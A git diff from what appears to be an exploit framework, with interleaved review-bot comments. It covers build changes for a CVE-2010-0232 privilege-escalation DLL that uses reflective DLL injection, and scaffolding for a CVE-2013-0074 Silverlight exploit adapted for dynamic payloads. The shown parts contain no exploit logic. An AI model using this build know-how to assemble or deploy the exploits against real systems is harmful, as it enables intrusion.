WIN32;NDEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions) true MultiThreaded @@ -121,17 +121,21 @@ /ignore:4070 - editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF EXIST "..\..\..\..\..\data\exploits\CVE-2010-0232\" GOTO COPY + mkdir "..\..\..\..\..\data\exploits\CVE-2010-0232\" +:COPY +copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2010-0232\" - + + - 
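Review bot: The two rewritten includes now resolve three directories up into the `ReflectiveDLLInjection` submodule, so a checkout made without `git submodule update --init` fails at this line with a bare cannot-open-include-file error that names nothing about the submodule. A one-line comment above the include would save the next builder the hunt: `// ReflectiveLoader.c lives in the external/source/ReflectiveDLLInjection submodule; run "git submodule update --init" before building.` Because the compiled DLL is what ends up under data/exploits, it is also worth recording (in a README for this exploit, none of which appears in the diff) that the exact submodule commit, not just its URL, determines what gets built. The hunk covers only the include list; the rest of the translation unit is outside it.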
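Review bot: The new post-build commands `copy /y` the freshly linked DLL straight over `..\..\..\..\..\data\exploits\CVE-2010-0232\`, which is the binary the framework ships and injects, and they do so silently on every local build; if this event is also attached to the Debug configuration (the hunk does not show which configuration owns it), a debug build quietly replaces the distributed artifact. The `> NUL` on the editbin line additionally hides a failed or missing `editbin.exe`, and the copy still runs afterwards, so a DLL that never received the `/OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0` rewrite could land in data\ looking like a good build. Failing fast before the copy is one line: `editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL || exit /b 1`. Whether MSBuild's Exec would surface the editbin failure on its own cannot be told from the hunk, which is why the explicit exit is cheap insurance.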
diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters index 3c522c527e..9aea3a8408 100644 --- a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters +++ b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters @@ -2,24 +2,24 @@ - - common - common + + RDI + common - - common - common + + RDI + @@ -28,5 +28,8 @@ {cbb362dd-4029-4348-86d3-62c4b22c742d} + + {662e77af-b8cd-4717-a3f2-87b2ec57f46c} + \ No newline at end of file diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj b/external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj index 32875e0cb3..41cb73ff96 100644 --- a/external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj +++ b/external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj @@ -49,7 +49,7 @@ Disabled - %(AdditionalIncludeDirectories) + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) WIN32;_DEBUG;_WINDOWS;_USRDLL;KITRAP0D_PAYLOAD_EXPORTS;%(PreprocessorDefinitions) true EnableFastChecks @@ -75,7 +75,7 @@ MinSpace OnlyExplicitInline false - %(AdditionalIncludeDirectories) + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) WIN32;NDEBUG;_WINDOWS;_USRDLL;KITRAP0D_PAYLOAD_EXPORTS;%(PreprocessorDefinitions) true MultiThreaded diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c b/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c index 7bc93fcb93..bacbb7b87f 100755 --- a/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c +++ b/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c 
@@ -7,7 +7,7 @@ #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN -#include "../common/ReflectiveLoader.c" +#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include #include "kitrap0d.h" diff --git a/external/source/exploits/CVE-2010-0232/make.msbuild b/external/source/exploits/CVE-2010-0232/make.msbuild new file mode 100755 index 0000000000..a44980b045 --- /dev/null +++ b/external/source/exploits/CVE-2010-0232/make.msbuild @@ -0,0 +1,18 @@ + + + + .\kitrap0d.sln + + + + + + + + + + + + + + diff --git a/external/source/exploits/cve-2013-0074/.gitignore b/external/source/exploits/cve-2013-0074/.gitignore new file mode 100755 index 0000000000..653f65a11e --- /dev/null +++ b/external/source/exploits/cve-2013-0074/.gitignore @@ -0,0 +1,12 @@ +SilverApp1/Release/ +SilverApp1/Debug/ +SilverApp1/Bin/Release/ +SilverApp1/Bin/Debug/ +SilverApp1/obj/Release/ +SilverApp1/obj/Debug/ +SilverApp1/SilverApp1.csproj.user +SilverApp1.ncb +SilverApp1.suo +SilverApp1.sdf +SilverApp1.opensdf +SilverApp1.v11.suo diff --git a/external/source/exploits/cve-2013-0074/README b/external/source/exploits/cve-2013-0074/README new file mode 100644 index 0000000000..daeec3271c --- /dev/null +++ b/external/source/exploits/cve-2013-0074/README @@ -0,0 +1,14 @@ +Original Exploit by Vitaliy Toropov + +See Packet Storm Advisory 2013-1022-1 +http://packetstormsecurity.com/files/123732/PSA-2013-1022-1.txt + +Source code just modified to add a new Silverlight 5 target and tweak it to allow dynamic payloads, not +just the hardcoded one. + +In order to put an environment ready: + +- Install Visual Studio 2010 +- Install Visual Studio 2010 SP1 +- Install Silverlight 5 tools for Visual Studio 2010. (http://www.microsoft.com/en-us/download/details.aspx?id=28358) +- Install the Silverlight5 Developer version (SDK) needed for testing. \ No newline at end of file 
diff --git a/external/source/exploits/cve-2013-0074/SilverApp1.sln b/external/source/exploits/cve-2013-0074/SilverApp1.sln new file mode 100755 index 0000000000..79680f0e2b --- /dev/null +++ b/external/source/exploits/cve-2013-0074/SilverApp1.sln @@ -0,0 +1,20 @@ + +Microsoft Visual Studio Solution File, Format Version 11.00 +# Visual Studio 2010 +Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SilverApp1", "SilverApp1\SilverApp1.csproj", "{D33B3660-E6CA-4B29-9E09-0DF99B28840E}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Any CPU = Debug|Any CPU + Release|Any CPU = Release|Any CPU + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {D33B3660-E6CA-4B29-9E09-0DF99B28840E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {D33B3660-E6CA-4B29-9E09-0DF99B28840E}.Debug|Any CPU.Build.0 = Debug|Any CPU + {D33B3660-E6CA-4B29-9E09-0DF99B28840E}.Release|Any CPU.ActiveCfg = Release|Any CPU + {D33B3660-E6CA-4B29-9E09-0DF99B28840E}.Release|Any CPU.Build.0 = Release|Any CPU + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml b/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml new file mode 100755 index 0000000000..8c7b18d4b2 --- /dev/null +++ b/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml @@ -0,0 +1,8 @@ + + + + + diff --git a/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml.cs b/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml.cs new file mode 100755 index 0000000000..c3c386304a --- /dev/null +++ b/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml.cs 
@@ -0,0 +1,65 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Net;
+using System.Windows;
+using System.Windows.Controls;
+using System.Windows.Documents;
+using System.Windows.Input;
+using System.Windows.Media;
+using System.Windows.Media.Animation;
+using System.Windows.Shapes;
+
+namespace SilverApp1
+{
+ public partial class App : Application
+ {
+
+ public App()
+ {
+ this.Startup += this.Application_Startup;
+ this.Exit += this.Application_Exit;
+ this.UnhandledException += this.Application_UnhandledException;
+
+ InitializeComponent();
+ }
+
+ private void Application_Startup(object sender, StartupEventArgs e)
+ {
+ this.RootVisual = new MainPage(e.InitParams);
+ }
+
+ private void Application_Exit(object sender, EventArgs e)
+ {
+
+ }
+
+ private void Application_UnhandledException(object sender, ApplicationUnhandledExceptionEventArgs e)
+ {
+ // If the app is running outside of the debugger then report the exception using
+ // the browser's exception mechanism. On IE this will display it a yellow alert
+ // icon in the status bar and Firefox will display a script error.
+ if (!System.Diagnostics.Debugger.IsAttached) {
+
+ // NOTE: This will allow the application to continue running after an exception has been thrown
+ // but not handled.
+ // For production applications this error handling should be replaced with something that will
+ // report the error to the website and stop the application.
+ e.Handled = true;
+ Deployment.Current.Dispatcher.BeginInvoke(delegate { ReportErrorToDOM(e); });
+ }
+ }
+
+ private void ReportErrorToDOM(ApplicationUnhandledExceptionEventArgs e)
+ {
+ try {
+ string errorMsg = e.ExceptionObject.Message + e.ExceptionObject.StackTrace;
+ errorMsg = errorMsg.Replace('"', '\'').Replace("\r\n", @"\n");
+
+ System.Windows.Browser.HtmlPage.Window.Eval("throw new Error(\"Unhandled Error in Silverlight Application " + errorMsg + "\");");
+ }
+ catch (Exception) {
+ }
+ }
+ }
+}
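Review bot: The escaping in `ReportErrorToDOM` is incomplete: the exception text is spliced into a JavaScript string literal after neutralising only `"` and `\r\n`, so a backslash (a Windows path, should one appear in the trace), a bare `\n` or a lone `\r` in `errorMsg` breaks the literal, `Window.Eval` throws, and the empty `catch (Exception)` swallows that, leaving no report at all. Escaping backslashes first and covering both line-ending characters keeps the call well-formed: `errorMsg = errorMsg.Replace("\\", "\\\\").Replace('"', '\'').Replace("\r\n", "\n").Replace("\n", @"\n").Replace("\r", @"\r");`. Since this application runs inside the exploit's own hosting page, the trace reaches only that page, so the concern is losing debugging output rather than exposing it. The handler is the stock Silverlight template; the largely unused `using` list is harmless but could be trimmed.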
diff --git a/external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml b/external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml new file mode 100755 index 0000000000..008eababf2 --- /dev/null +++ b/external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml @@ -0,0 +1,14 @@ + + + +